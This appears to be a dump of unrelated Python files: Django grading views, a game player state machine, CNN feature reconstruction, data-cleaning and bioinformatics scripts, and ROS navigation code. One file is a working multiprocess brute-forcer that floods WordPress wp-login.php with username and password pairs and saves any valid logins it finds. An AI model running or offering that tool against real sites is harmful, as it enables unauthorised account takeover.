    questao = get_object_or_404(TesteQuestao,pk=questao_id)
    ret = comparar(questao,user)
    return render_to_response('Teste/testeRodar.html', locals(),context_instance=RequestContext(request))
def removerTudoQuestao(user,questao):
    """Delete the per-user artifacts of *questao*: source files, the
    executable and the output file.  Always returns True.

    NOTE(review): the sources path uses "fonte/" here while compilar()
    uses "fontes/", and user.username here vs questao.user.username
    there -- confirm which is correct.  Also, each exists() check tests a
    directory while remove() targets a file inside it.
    """
    pathExec = settings.MEDIA_ROOT + """execs/"""+user.username+"/"
    execFilePath = pathExec + questao.titulo
    pathSaida = settings.MEDIA_ROOT + """saida/"""+user.username+"/"
    saidaFilePath = pathSaida + questao.titulo
    for fonte in questao.fontes.all():
        pathFontes = settings.MEDIA_ROOT + """fonte/"""+user.username
        sourceFilePath = settings.MEDIA_ROOT + fonte.fonte.__str__()
        mkFilePath = os.path.join(pathFontes,"makefile")
        # remove the source file
        if os.path.exists(pathFontes):
            os.remove(sourceFilePath)
        # remove the makefile?
        #os.remove(mkFilePath)
    # remove the executable
    if os.path.exists(pathExec):
        os.remove(execFilePath)
    # remove the output file
    if os.path.exists(pathSaida):
        os.remove(saidaFilePath)
    return True
@login_required
def testeTudo(request,questao_id):
    """View: compile, run and compare in sequence, clean up all generated
    files, and render the combined status string."""
    user = request.user
    questao = get_object_or_404(TesteQuestao,pk=questao_id)
    ret1 = compilar(questao,user)
    ret2 = rodar(questao,user)
    ret3 = comparar(questao,user)
    # Combined report: one exit status per stage.
    ret =str(ret1)+"\n\n"+str(ret2)+"\n\n"+str(ret3)+"\n\n"
    removerTudoQuestao(user,questao)
    return render_to_response('Teste/testeRodar.html', locals(),context_instance=RequestContext(request))
|
import random
import app
from physics import Component as PhysicsComponent
from animation import Animation, AnimationFactory
from config import Player as config
# Player controls
class Controls:
    """Symbolic input/event codes fed into Model.control()."""
    END = 0     # current (non-looping) animation finished
    JUMP = 1
    LEFT = 2
    RIGHT = 3
    GROUND = 4  # physics reports ground contact
    ATTACK = 5
class State(object):
    """Base state of the player state machine; concrete states override
    the lifecycle hooks below."""

    def __init__(self, model):
        self.model = model

    def update(self):
        """Per-frame hook; no-op in the base state."""

    def on_start(self):
        """Called when the machine enters this state; no-op here."""

    def on_end(self):
        """Called when the machine leaves this state; no-op here."""
class AnimatedState(State):
    """State driven by an animation; feeds END into the machine once the
    animation reports it has finished."""

    def __init__(self, model, animation):
        super(AnimatedState, self).__init__(model)
        self.animation = animation

    def on_start(self):
        # Expose our animation on the model and restart it from frame 0.
        self.model.animation = self.animation
        self.animation.reset()

    def on_finished(self):
        # A finished animation is reported as the END control.
        self.model.control(Controls.END)

    def update(self):
        super(AnimatedState, self).update()
        if not self.animation.finished:
            return
        self.on_finished()
class MoveState(AnimatedState):
    """Animated state that also translates the model horizontally by a
    fixed speed (sign encodes direction) every frame."""

    def __init__(self, model, animation, speed):
        super(MoveState, self).__init__(model, animation)
        self.speed = speed

    def update(self):
        super(MoveState, self).update()
        # Constant horizontal velocity applied each frame.
        self.model.physics.position.x += self.speed
class JumpState(AnimatedState):
    """Airborne state: applies the jump impulse on entry (only from the
    ground, so no mid-air double jumps) and reports GROUND once physics
    says the player has landed."""

    def __init__(self, model, animation, force):
        super(JumpState, self).__init__(model, animation)
        self.force = force

    def on_start(self):
        super(JumpState, self).on_start()
        if self.model.physics.ground:
            # Negative y is up: subtract the impulse from vertical velocity.
            self.model.physics.velocity.y -= self.force

    def on_ground(self):
        self.model.control(Controls.GROUND)

    def update(self):
        super(JumpState, self).update()
        if self.model.physics.ground:
            self.on_ground()
class JumpMoveState(JumpState):
    """Jump state with horizontal movement: same landing/impulse logic as
    JumpState plus a constant x translation each frame."""

    def __init__(self, model, animation, speed, force):
        super(JumpMoveState, self).__init__(model, animation, force)
        self.speed = speed

    def update(self):
        super(JumpMoveState, self).update()
        self.model.physics.position.x += self.speed
class Model(app.Drawable):
    """Player model: a physics component plus an animation-driven finite
    state machine.  ``states`` maps a state key to its State object and
    ``transitions`` maps (control, predicate) pairs to the next state key."""

    def __init__(self):
        self.physics = PhysicsComponent(config['size'])
        fact = AnimationFactory()
        # One state object per pose/action; move and jump states carry the
        # configured walk speed and jump acceleration.  Jump/attack
        # animations are non-looping so they can signal END.
        self.states = {
            'idle_left': AnimatedState(self, fact.get('idle_left')),
            'idle_right': AnimatedState(self, fact.get('idle_right')),
            'walk_left': MoveState(self, fact.get('walk_left'), -config['speeds']['walk']),
            'walk_right': MoveState(self, fact.get('walk_right'), config['speeds']['walk']),
            'idle_jump_left': JumpState(self, fact.get('jump_left', loop=False), config['accelerations']['jump']),
            'idle_jump_right': JumpState(self, fact.get('jump_right', loop=False), config['accelerations']['jump']),
            'jump_left': JumpMoveState(self, fact.get('jump_left', loop=False), -config['speeds']['walk'], config['accelerations']['jump']),
            'jump_right': JumpMoveState(self, fact.get('jump_right', loop=False), config['speeds']['walk'], config['accelerations']['jump']),
            'attack_left': AnimatedState(self, fact.get('vomit_left', loop=False)),
            'attack_right': AnimatedState(self, fact.get('vomit_right', loop=False)),
        }
        # State-machine edges: for each state, which (control, pred) pair
        # moves the machine to which state key.
        self.transitions = {
            'idle_left': {
                (Controls.LEFT, True): 'walk_left',
                (Controls.RIGHT, True): 'walk_right',
                (Controls.JUMP, True): 'idle_jump_left',
                (Controls.ATTACK, True): 'attack_left'
            },
            'idle_right': {
                (Controls.LEFT, True): 'walk_left',
                (Controls.RIGHT, True): 'walk_right',
                (Controls.JUMP, True): 'idle_jump_right',
                (Controls.ATTACK, True): 'attack_right'
            },
            'walk_left': {
                (Controls.LEFT, False): 'idle_left',
                (Controls.RIGHT, True): 'walk_right',
                (Controls.JUMP, True): 'jump_left',
                (Controls.ATTACK, True): 'attack_left'
            },
            'walk_right': {
                (Controls.LEFT, True): 'walk_left',
                (Controls.RIGHT, False): 'idle_right',
                (Controls.JUMP, True): 'jump_right',
                (Controls.ATTACK, True): 'attack_right'
            },
            'idle_jump_left': {
                (Controls.GROUND, True): 'idle_left',
                (Controls.LEFT, True): 'jump_left',
                (Controls.RIGHT, True): 'jump_right'
            },
            'idle_jump_right': {
                (Controls.GROUND, True): 'idle_right',
                (Controls.RIGHT, True): 'jump_right',
                (Controls.LEFT, True): 'jump_left'
            },
            'jump_left': {
                (Controls.GROUND, True): 'walk_left',
                (Controls.LEFT, False): 'idle_jump_left'
            },
            'jump_right': {
                (Controls.GROUND, True): 'walk_right',
                (Controls.RIGHT, False): 'idle_jump_right'
            },
            'attack_left': {
                (Controls.END, True): 'idle_left'
            },
            'attack_right': {
                (Controls.END, True): 'idle_right'
            }
        }
        self.animation = None
        # Start idle, facing a random direction.
        self.saved_state_key = self.state_key = 'idle_' \
            + random.choice(['left', 'right'])
        self.state = self.states[self.state_key]
        self.state.on_start()

    def update(self):
        """Advance physics and the active state, apply any pending state
        switch (requested via control()), then advance the animation."""
        self.physics.update()
        if self.state:
            self.state.update()
        if self.state_key != self.saved_state_key:
            # A transition happened: run the exit/enter hooks.
            self.saved_state_key = self.state_key
            self.state.on_end()
            self.state = self.states[self.state_key]
            self.state.on_start()
        self.animation.advance()

    def control(self, control, pred=True):
        """Feed one control event into the state machine; combinations
        with no outgoing edge are ignored on purpose."""
        try:
            self.state_key = self.transitions[self.state_key][(control, pred)]
        except KeyError:
            pass

    def render(self, graphics):
        """Draw the current animation frame at the physics position."""
        graphics.push_state()
        x, y = self.physics.position
        graphics.translate(x, y)
        graphics.draw(self.animation)
        graphics.pop_state()
|
# Read three integers and report whether they are in strictly
# increasing order (messages in Portuguese, as in the original).
first = int(input("Digite o primeiro número:"))
second = int(input("Digite o segundo número:"))
third = int(input("Digite o terceiro número:"))
is_increasing = first < second < third
if is_increasing:
    print("crescente")
else:
    print("não está em ordem crescente")
|
#!/usr/bin/env python
"""Container entry script: patch collectd configs, start apache2 and
collectd, then generate HTTP traffic (one OK path, one 404) forever."""
import threading
import logging
import sys
from dockercommon import execute, fix_collectd_file, fix_signalfx_collectd_file, repeated_http_get

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
logger = logging.getLogger(__name__)

fix_signalfx_collectd_file()
fix_collectd_file()
execute(["service", "apache2", "start"], expected_code=0)
execute(["service", "collectd", "start"], expected_code=0)

threads = [
    threading.Thread(target=repeated_http_get, args=("/index.html", .1, 80)),
    threading.Thread(target=repeated_http_get, args=("/nothere", .2, 80)),
]
# Plain loops instead of side-effect list comprehensions.
for t in threads:
    t.start()
for t in threads:
    # Fix: Thread.isAlive() was removed in Python 3.9; is_alive() is the
    # supported spelling.  join() on a finished thread is a no-op, so the
    # liveness guard is kept only to mirror the original intent.
    if t is not None and t.is_alive():
        t.join()
|
import torch
import ZZYResNet18
# Load a trained ResNet-18 variant (exposing pooling indices) for CIFAR-10
# and switch to eval mode so BN/dropout behave deterministically.
model = ZZYResNet18.ZZYResNet18_indices(n_classes=10)
model.load_state_dict(torch.load("./cifar_net89.pth"))
model.eval()
# Direct references to every conv layer so the reconstruction pass below
# can walk the network backwards layer by layer.
conv1 = model.conv1
maxpool = model.maxpool
conv2_x = model.conv2_x
conv2_x_bb1_conv1 = conv2_x[0].conv1
conv2_x_bb1_conv2 = conv2_x[0].conv2
conv2_x_bb2_conv1 = conv2_x[1].conv1
conv2_x_bb2_conv2 = conv2_x[1].conv2
conv3_x = model.conv3_x
conv3_x_bb1_conv1 = conv3_x[0].conv1
conv3_x_bb1_conv2 = conv3_x[0].conv2
conv3_x_bb2_conv1 = conv3_x[1].conv1
conv3_x_bb2_conv2 = conv3_x[1].conv2
conv4_x = model.conv4_x
conv4_x_bb1_conv1 = conv4_x[0].conv1
conv4_x_bb1_conv2 = conv4_x[0].conv2
conv4_x_bb2_conv1 = conv4_x[1].conv1
conv4_x_bb2_conv2 = conv4_x[1].conv2
conv5_x = model.conv5_x
conv5_x_bb1_conv1 = conv5_x[0].conv1
conv5_x_bb1_conv2 = conv5_x[0].conv2
conv5_x_bb2_conv1 = conv5_x[1].conv1
conv5_x_bb2_conv2 = conv5_x[1].conv2
def deconv(feature_map, conv):
    """Invert *conv* by applying its weights as a transposed convolution.

    The feature map's two spatial axes are swapped (dims 2 and 3) before
    the transposed convolution, mirroring the original implementation.
    Strided convs get output_padding=1 so the input size is recovered.
    """
    pad_out = 1 if conv.stride[0] != 1 else 0
    flipped = feature_map[:, :, :, :].transpose(2, 3)
    return torch.nn.functional.conv_transpose2d(
        flipped,
        conv.weight[:, :, :, :],
        bias=None,
        stride=conv.stride,
        padding=conv.padding,
        output_padding=pad_out,
        groups=1,
        dilation=1,
    )
class FeatureMapSaver():
    """Forward hook that records a module's most recent output tensor in
    ``self.feature_map``."""

    def __init__(self, module):
        # register_forward_hook fires after every forward() of the module.
        self.hook = module.register_forward_hook(self.hook_fn)

    def hook_fn(self, module, input, output):
        self.feature_map = output

    def close(self):
        """Detach the hook from the module."""
        self.hook.remove()
# Capture the deepest conv layer's output during the forward pass.
fms_conv5_x_bb2_conv2 = FeatureMapSaver(conv5_x_bb2_conv2)
class IndicesSaver():
    """Forward hook that records the indices tensor (second element of the
    output tuple) of a module created with ``return_indices=True``."""

    def __init__(self, module):
        self.hook = module.register_forward_hook(self.hook_fn)

    def hook_fn(self, module, input, output):
        # output is (values, indices); keep only the indices.
        self.indices = output[1]

    def close(self):
        """Detach the hook from the module."""
        self.hook.remove()
# Capture the pooling indices needed later by max_unpool2d.
is_maxpool = IndicesSaver(maxpool)
import torch
import torchvision
import torchvision.transforms as transforms
# Upscale CIFAR-10 images to 224x224 and convert to tensors; the channel
# normalisation is kept separate so it can be applied per image later.
resize_to_tensor = transforms.Compose(
    [transforms.Resize((224, 224)),
     transforms.ToTensor()])
# Channel means/stds commonly used for CIFAR-10.
norm = transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))
# NOTE(review): root='.../data' looks like a placeholder path -- confirm.
testset = torchvision.datasets.CIFAR10(root='.../data', train=False,
                                       download=True, transform=resize_to_tensor)
testloader = torch.utils.data.DataLoader(testset, batch_size=1,
                                         shuffle=False, num_workers=0)
import zzytools
def get_reconstructed_image(ith):
    """Project the conv5 feature map of test image `ith` back to pixel space.

    Runs the model forward so the hooks capture activations, then walks the
    conv stack in reverse (transposed conv + ReLU at each step), undoes the
    stem max-pool with the saved switch indices, and finally inverts conv1.
    The result is per-channel max-normalised and returned as an (H, W, C)
    tensor clamped to [0, 1].
    """
    input_img, label = testloader.dataset[ith]
    input_img = norm(input_img)
    print(label)
    model(input_img.unsqueeze(0))
    # ('b', 'c', 'h', 'w') activation captured by the forward hook.
    feature_map = fms_conv5_x_bb2_conv2.feature_map
    # Conv layers in reverse order, conv5 down to conv2.
    reversed_convs = [
        conv5_x_bb2_conv2, conv5_x_bb2_conv1, conv5_x_bb1_conv2, conv5_x_bb1_conv1,
        conv4_x_bb2_conv2, conv4_x_bb2_conv1, conv4_x_bb1_conv2, conv4_x_bb1_conv1,
        conv3_x_bb2_conv2, conv3_x_bb2_conv1, conv3_x_bb1_conv2, conv3_x_bb1_conv1,
        conv2_x_bb2_conv2, conv2_x_bb2_conv1, conv2_x_bb1_conv2, conv2_x_bb1_conv1,
    ]
    for layer in reversed_convs:
        feature_map = torch.relu(deconv(feature_map, layer))
    feature_map = torch.nn.functional.max_unpool2d(
        feature_map, is_maxpool.indices, 3, stride=2, padding=0,
        output_size=(112, 112))
    feature_map = torch.relu(feature_map)
    img_tensor_in = deconv(feature_map, conv1)
    import cv2
    pattern_img = img_tensor_in[0, :, :, :].transpose(0, 2).clamp(0, 1).detach()
    # Per-channel max normalisation; applied twice as in the original trace
    # (the second pass divides by 1.0 and is a no-op unless a channel max
    # was 0, where both passes yield NaN alike).
    for _ in range(2):
        for c in range(pattern_img.shape[2]):
            pattern_img[:, :, c] = pattern_img[:, :, c] / pattern_img[:, :, c].max()
    return pattern_img
# Reconstruct 16 consecutive test images (starting at index 4531) and plot
# them both as RGB composites and as per-channel maps.
patterns_x16 = torch.cat([get_reconstructed_image(i).unsqueeze(0) for i in range(4531, 4531 + 16)])
zzytools.plot_rgb_images(patterns_x16.permute(1, 2, 3, 0).detach().numpy(), 'conv5_reconstruted_pattern', plot_dir='./conv5_reconstruted_pattern_trunck')
zzytools.plot_conv_feature_map(patterns_x16.permute(1, 2, 3, 0).detach().numpy(), 'conv5_reconstruted_pattern_chanel', plot_dir='./conv5_reconstruted_pattern_trunck')
# `matrix` is a 2-D list of 0/1 ints.
def Largest(matrix):
    """Return the area of the largest square consisting solely of 1s.

    Classic dynamic programme: dp[y][x] is the side length of the largest
    all-ones square whose bottom-right corner is (y, x); a cell extends the
    smallest of its three neighbouring squares by one.

    Fixes over the previous version, which only inspected the local 2x2
    window and grew the diagonal (dp[y-1][x-1] + 1): that over-counts
    (e.g. [[1,1,1],[1,1,1],[0,1,1]] reported 9 instead of 4) and it
    returned 1 even for an all-zero or empty matrix.
    """
    if not matrix or not matrix[0]:
        return 0
    height, width = len(matrix), len(matrix[0])
    dp = [[0] * width for _ in range(height)]
    best = 0
    for y in range(height):
        for x in range(width):
            if matrix[y][x] != 1:
                continue
            if y == 0 or x == 0:
                dp[y][x] = 1  # border cells can anchor at most a 1x1 square
            else:
                dp[y][x] = min(dp[y - 1][x], dp[y][x - 1], dp[y - 1][x - 1]) + 1
            best = max(best, dp[y][x])
    return best ** 2
# Demo: the matrices contain largest all-ones squares of side 3 and 4
# respectively, so the expected output is 9 then 16.
print(Largest([[1,0,1,1,1],[0,0,0,1,1],[0,1,1,1,1],[0,1,1,1,1],[0,1,1,1,1]]))
print(Largest([[1,0,1,1,1],[1,1,1,1,1],[0,1,1,1,1],[0,1,1,1,1],[0,1,1,1,1]]))
|
from src.util.Build import NaveBuilder
from src.util.FabricaNaves import FabricaNavePerdida
from src.cgd import Path
class NavePerdidaBuilder(NaveBuilder):
    """Concrete builder for the 'lost ship' (NavePerdida) product.

    The constructor runs every build step, so the product is fully
    configured right after instantiation.
    """

    def __init__(self):
        super(NavePerdidaBuilder, self).__init__()
        # Run all build steps in the canonical order.
        for step in (self.build_dano, self.buildimagem_nave,
                     self.build_imagem_explosao, self.build_som,
                     self.build_nave):
            step()

    # ---- build steps (each overrides NaveBuilder) ----

    def build_dano(self):
        # This ship deals no damage.
        self.nave_product.dano = 0

    def buildimagem_nave(self):
        # Sprite for the ship itself.
        self.nave_product.imagem_nave = Path.get_path() + "Imagem/Nave/NavePerdida.png"

    def build_imagem_explosao(self):
        # Sprite shown when the ship explodes.
        self.nave_product.imagem_explosao = Path.get_path() + "Imagem/Nave/NaveExplode.png"

    def build_som(self):
        # Background sound for the ship.
        self.nave_product.som = Path.get_path() + "Som/MusicNave.wav"

    def build_nave(self):
        # Assemble the factory from the previously built attributes.
        self.nave_product.nave_fabrica = FabricaNavePerdida.FabricaNavePerdida(
            self.nave_product.imagem_nave,
            self.nave_product.imagem_explosao,
            self.nave_product.som)
|
# TODO: shits going kind of slow
import socket, re, itertools, ssl
from time import sleep
from os import strerror
from multiprocessing import Pool, Lock, active_children
from urllib import urlencode
# Process-shared lock guarding appends to the valid-logins output file.
global lock
lock = Lock()
class BrutePasswords(object):
    """One username/password attempt against a WordPress wp-login.php.

    Reads the module globals set by brutePasses(): host, port, path,
    secure and logins. run() returns 0 on a completed attempt and 1 when
    the attempt should be retried or was inconclusive.

    NOTE(review): Python 2 module (urllib.urlencode import above); kept
    py2-compatible.
    """

    def __init__(self, username, password):
        self.username = username
        self.password = password
        # Form body the WordPress login form expects.
        self.postfields = urlencode([('log', self.username),
                                     ('pwd', self.password),
                                     ('wp-submit', 'Log+In')])

    def run(self):
        """Perform one login POST and classify the server's response."""
        self.trigger = 0
        self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Wrap the socket in TLS only when the caller asked for HTTPS.
        if (secure == 1): self.ssocket = ssl.wrap_socket(self.s)
        else: self.ssocket = self.s
        self.connmsg = self.ssocket.connect_ex((host, port))
        while (self.connmsg != 0):
            print("ERROR:\t%s" % strerror(self.connmsg))
            sleep(2.1)
            self.connmsg = self.ssocket.connect_ex((host, port))
        self.ssocket.send("POST "+path+"wp-login.php HTTP/1.1\r\nContent-Length: "+str(len(self.postfields))+"\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: "+host+"\r\n\r\n"+self.postfields)
        self.chunk = self.ssocket.recv(2600)
        # Keep reading until the login page (which carries the
        # "lostpassword" link) shows up, or give up after 8 extra reads.
        while (self.chunk.find("action=lostpassword") <= 0 and self.trigger != 8):
            sleep(1)
            self.chunk += self.ssocket.recv(800)
            self.trigger += 1
        self.ssocket.shutdown(socket.SHUT_RDWR)
        self.ssocket.close()
        if (self.trigger == 8):
            print("Not enough data returned")
            return 1
        if (self.chunk.find("is incorrect") <= 0):
            # No "is incorrect" marker in the response -> credentials worked.
            print("Valid login found:\t%s:%s" % (self.username, self.password))
            lock.acquire()
            f = open(logins, "a")
            f.write("%s:%s\n" % (self.username, self.password))
            f.close()
            lock.release()
        elif (self.chunk.find("500 Internal") > 0):
            print("500 Internal Server Error seen, you may be sending too fast!")
            return 1
        elif (self.chunk.find("200 OK") <= 0):
            # BUG FIX: was `str(chunk)` — an undefined name that raised
            # NameError whenever this branch was reached.
            print("Irregular server response seen.\n%s" % str(self.chunk))
            return 1
        return 0
def worker(passlist):
    """Try every (username, password) pair from this password chunk."""
    for raw_user in usernames:
        user = str(raw_user.strip("\n"))
        for raw_pass in passlist:
            pw = str(raw_pass.strip("\n"))
            # Retry until run() reports a completed attempt (returns 0).
            while (BrutePasswords(user, pw).run() != 0):
                sleep(1)
def grouper(iterable, n, fillvalue=None):
    """Yield successive lists of up to `n` items from `iterable`.

    Iteration stops at the first empty slice; the trailing group may be
    shorter than `n`. `fillvalue` is accepted for interface compatibility
    but unused (groups are never padded).

    Fixed: the old implementation passed the generator's bound `.next`
    method to iter(), which only exists on Python 2; a lambda with
    iter(callable, sentinel) behaves identically on Python 2 and 3.
    """
    it = iter(iterable)
    return iter(lambda: list(itertools.islice(it, n)), [])
def brutePasses(userlist, passlist, hosti, pathi, porti, securei, psize, loginsi):
    """Distribute the password list over a pool of brute-force workers.

    NOTE(review): Python 2 only — uses itertools.izip and relies on
    integer (floor) division when computing chunksize.
    """
    # Workers are separate processes; they read the target through globals.
    global host
    host = hosti
    global port
    port = porti
    global secure
    secure = securei
    global logins
    logins = loginsi
    global path
    path = pathi
    global usernames
    usernames = userlist
    usersize = len(userlist)
    passsize = len(passlist)
    # manage pool
    if (psize == 0): psize = 5
    if ((usersize*passsize) <= psize): chunksize = 1
    else: chunksize = (((usersize*passsize) / psize) + ((usersize*passsize) % psize))
    #print("%s" % ((ceil(float((usersize*passsize)) / psize)) + ((usersize*passsize) % psize)))
    print("Userlist size: %d\tPassword size: %d\tChunk size: %d\tPool size: %d" % (usersize,passsize,chunksize,psize))
    pool = Pool(processes=psize)
    # izip over a single iterable yields 1-tuples, so each map_async call
    # receives one chunk of password groups.
    for chunk in itertools.izip(grouper(passlist,chunksize)): pool.map_async(worker,chunk)
    pool.close()
    try:
        while(len(active_children()) > 0): # how many active children do we have
            sleep(2)
            ignore = active_children()
    except KeyboardInterrupt: exit('CTRL^C caught, exiting...\n\n')
    print("Password bruteforce attempts completed")
|
import pandas as pd
# Source workbook from Mars with one row per MTR document.
df = pd.read_excel(r'C:\Users\jberg\OneDrive - A-T Controls, Inc\pythonMTR\mtrinput.xlsx')
size = []
materiallist = []
material = []
partno = []
component = []
endstyle = []
# Recognised end-style codes to search for inside each part number.
endoptions = ["BW", "DA", "F1", "F3", "F6", "L1", "L3", "LUG", "TH", "SA", "SF", "SO", "SW", "WAFER"]
# adding pdf file extension to filename column
df["FileName(exact).pdf"] = df["FileName(exact).pdf"] + ".pdf"
# extracting the partnumber and component from the format Mars provides
# (presumably "<size> <component>(<part number>)" — TODO confirm).
for line in df["A-TPartNo."]:
    partno.append(line[line.find('(') + 1:line.find(')')])
    component.append(line[line.find(' ') + 1:line.find('(')])
component = [i.upper() for i in component]
partno = [i.upper() for i in partno]
# fixing formatting errors in the component column
for i, line in enumerate(component):
    if component[i] == 'BLIND END':
        component[i] = 'BLIND'
    if component[i] == 'TSM TOP':
        component[i] = 'TOP/TSM'
    if component[i] == 'TSM DOWN':
        component[i] = 'DOWN/TSM'
# extracting size from the part number field (first whitespace-separated token)
size = df["A-TPartNo."].str.split(' ').str.get(0)
# extracting the heat number to be enumerated in next step
for line in df["HeatNo."]:
    materiallist.append(line)
materiallist = [str(i) for i in materiallist]
materiallist = [i.upper() for i in materiallist]
# determining the material from the heat number's trailing letter
for number, line in enumerate(materiallist):
    if materiallist[number][-1] == "W":
        material.append("WCB")
    elif materiallist[number][-1] == "S":
        material.append("CF8M")
    elif materiallist[number][-1] == "L":
        material.append("CF3M")
    else:
        material.append("")
# writing the endstyle column from option set up in variable endoptions
# (last matching option wins when several codes appear in one part number)
for i, line in enumerate(partno):
    endstyle.append("")
    for end in endoptions:
        if end in line:
            endstyle[i] = end
# fixing formatting errors in the size column
for i, line in enumerate(size):
    if size[i] == '11/2"':
        size[i] = '1-1/2"'
    elif size[i] == '11/4"':
        size[i] = '1-1/4"'
    elif size[i] == '21/2"':
        size[i] = '2-1/2"'
# saving values back to df
df["Size"] = size
df["A-TPartNo."] = partno
df["Component"] = component
df["EndStyle"] = endstyle
df["Material"] = material
# output to csv file
df.to_csv(r'C:\Users\jberg\OneDrive - A-T Controls, Inc\pythonMTR\output.csv', index=False)
# Known item names used by the missing-part check below.
df2 = pd.read_csv(r'C:\Users\jberg\OneDrive - A-T Controls, Inc\pythonMTR\items.csv', usecols=['Name'], encoding='ISO-8859-1')
missing = []
items = []
# Function takes two lists and returns the elements of the first that are
# absent from the second.
def non_match_elements(list_a, list_b):
    """Return the items of list_a not present in list_b, original order kept.

    Membership is tested against a set built once, making the pass
    O(len(a) + len(b)) instead of the previous O(len(a) * len(b)) scan of
    list_b for every element.
    """
    present = set(list_b)
    return [item for item in list_a if item not in present]
# Collect the known item names and report any part numbers missing from them.
for i in df2['Name']:
    items.append(i)
missing = non_match_elements(partno, items)
if len(missing) > 0:
    df3 = pd.DataFrame (missing, columns=['Missing Part Number'])
    df3.to_csv(r'C:\Users\jberg\OneDrive - A-T Controls, Inc\pythonMTR\missing.csv', index=False)
#!/usr/bin/env
# encoding: utf-8
"""
A graph whose nodes have all been labeled can be represented by an adjacency list, in which each row of the list contains the two node labels corresponding to a unique edge.
A directed graph (or digraph) is a graph containing directed edges, each of which has an orientation. That is, a directed edge is represented by an arrow instead of a line segment; the starting and ending nodes of an edge form its tail and head, respectively. The directed edge with tail v and head w is represented by (v,w) (but not by (w,v)). A directed loop is a directed edge of the form (v,v).
For a collection of strings and a positive integer k, the overlap graph for the strings is a directed graph Ok in which each string is represented by a node, and string s is connected to string t with a directed edge when there is a length k suffix of s that matches a length k prefix of t, as long as s≠t; we demand s≠t to prevent directed loops in the overlap graph (although directed cycles may be present).
Given: A collection of DNA strings in FASTA format having total length at most 10 kbp.
Return: The adjacency list corresponding to O3. You may return edges in any order.
Execute like:
python src/ex_13__overlap_graphs.py data/ex_13.txt output/ex_13.txt
"""
__author__ = 'johndibaggio'
import sys
import fileinput
# Copy so later code can index CLI args (input path, output path).
argv = list(sys.argv)
def build_adjacency_matrix(edge_map, k=3):
    """
    :param edge_map: map of ID to DNA string
    :type edge_map: dict
    :param k: size of overlap
    :type k: int
    :return: adjacency matrix, a list of 2-element lists, where each element is a tuple of node label and DNA string
    :rtype: [[(list, str)]]
    """
    # Index every string by its length-k prefix so suffix lookups are O(1).
    prefix_index = {}
    for label, dna in edge_map.items():
        prefix_index.setdefault(dna[:k], []).append((label, dna))
    edges = []
    for label, dna in edge_map.items():
        # Strings whose prefix equals this string's suffix are edge targets.
        for candidate in prefix_index.get(dna[-k:], []):
            # Skip identical strings to prevent directed loops.
            if candidate[1] != dna:
                edges.append([(label, dna), candidate])
    return edges
def init_edge_map(filename):
    """
    :param filename: file name
    :type filename: str
    :return: edge_map: map of ID to DNA string
    :rtype: dict
    """
    edge_map = dict()
    current_id = None
    pieces = []
    for line in fileinput.input(filename):
        if line.startswith(">"):
            # New FASTA header: flush the record collected so far.
            if current_id is not None:
                edge_map[current_id] = "".join(pieces)
            current_id = line.replace(">", "").replace("\n", "")
            pieces = []
        elif len(line) > 0:
            # Sequence data may span several lines.
            pieces.append(line.replace("\n", ""))
    # Flush the final record, but only if it actually has sequence data.
    if current_id is not None:
        trailing = "".join(pieces)
        if len(trailing) > 0:
            edge_map[current_id] = trailing
    return edge_map
k = 3
edge_map = init_edge_map(argv[1])
# NOTE(review): passes the literal 3 instead of k — keep these in sync.
adjacency_matrix = build_adjacency_matrix(edge_map, 3)
# For output, separate out labels
output_adjacency_lists = []
for adjacency_list in adjacency_matrix:
    labels, dna_strings = map(list, zip(*adjacency_list))
    output_adjacency_lists.append(labels)
# Write one "tail head" label pair per line to the output file.
output_file = open(argv[2], 'w+')
for output_adjacency_list in output_adjacency_lists:
    output_file.write(" ".join(output_adjacency_list) + '\n')
output_file.close()
|
"""Methods to assist making unit_tests"""
import string
import random
def id_generator(size=6, chars=string.ascii_uppercase + string.digits):
    """Return a random ID of `size` characters drawn from `chars`."""
    picked = [random.choice(chars) for _ in range(size)]
    return "".join(picked)
|
from django.conf.urls.defaults import *
# URLConf: route any remaining path to scaffold.views.section as
# `section_path`. NOTE(review): django.conf.urls.defaults and patterns()
# only exist in legacy Django (<= 1.7) — this file targets that era.
urlpatterns = patterns('scaffold.views',
    url(r'^(?P<section_path>.+)$', 'section', name="section"),
)
#!/usr/bin/env python
#-*- codinig: UTF-8 -*-
#from launch_demo import launch_demo
import rospy
import actionlib
from actionlib_msgs.msg import *
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
from nav_msgs.msg import Path
from geometry_msgs.msg import PoseWithCovarianceStamped,Twist
from tf_conversions import transformations
from math import pi
import tf
from std_srvs.srv import SetBool
from std_msgs.msg import Int32
import os
import time
import re
import subprocess
from std_srvs.srv import Trigger
import threading
import json
# import pyttsx
# Passed to the roslaunch commands below; "true"/"false" string, not a bool.
IS_OPEN_RVIZ="false"
def main():
    """Smoke-test helper: call the 'test' Trigger service once and print the result.

    NOTE(review): Python 2 syntax (print statement, `except X, e`).
    NOTE(review): Trigger requests normally take no payload — confirm the
    val(False) call against the service definition.
    """
    rospy.wait_for_service('test')
    try:
        val = rospy.ServiceProxy('test', Trigger)
        resp1 = val(False)
        print resp1.success, resp1.message
    except rospy.ServiceException, e:
        print e
class navigation_demo:
    """move_base action-client wrapper: publishes the initial pose and sends goals."""
    def __init__(self,pos):
        # `pos` is a tf-style pair ((x, y, z), (qx, qy, qz, qw)) recorded earlier.
        self.set_pose_pub = rospy.Publisher('/initialpose', PoseWithCovarianceStamped, queue_size=5)
        self.move_base = actionlib.SimpleActionClient("move_base", MoveBaseAction)
        self.move_base.wait_for_server(rospy.Duration(60))
        print(pos)
        self.init_pose_from_tf(pos)
    def init_pose_from_tf(self,pos):
        """Publish a saved tf transform as the initial pose on /initialpose."""
        pose = PoseWithCovarianceStamped()
        pose.header.stamp = rospy.Time.now()
        pose.header.frame_id = 'map'
        pose.pose.pose.position.x = pos[0][0]
        pose.pose.pose.position.y = pos[0][1]
        # q = transformations.quaternion_from_euler(0.0, 0.0, th/180.0*pi)
        pose.pose.pose.orientation.x = pos[1][0]
        pose.pose.pose.orientation.y = pos[1][1]
        pose.pose.pose.orientation.z = pos[1][2]
        pose.pose.pose.orientation.w = pos[1][3]
        self.set_pose_pub.publish(pose)
    def set_pose(self, p):
        """Publish an (x, y, yaw-in-degrees) triple as the initial pose."""
        if self.move_base is None:
            return False
        x, y, th = p
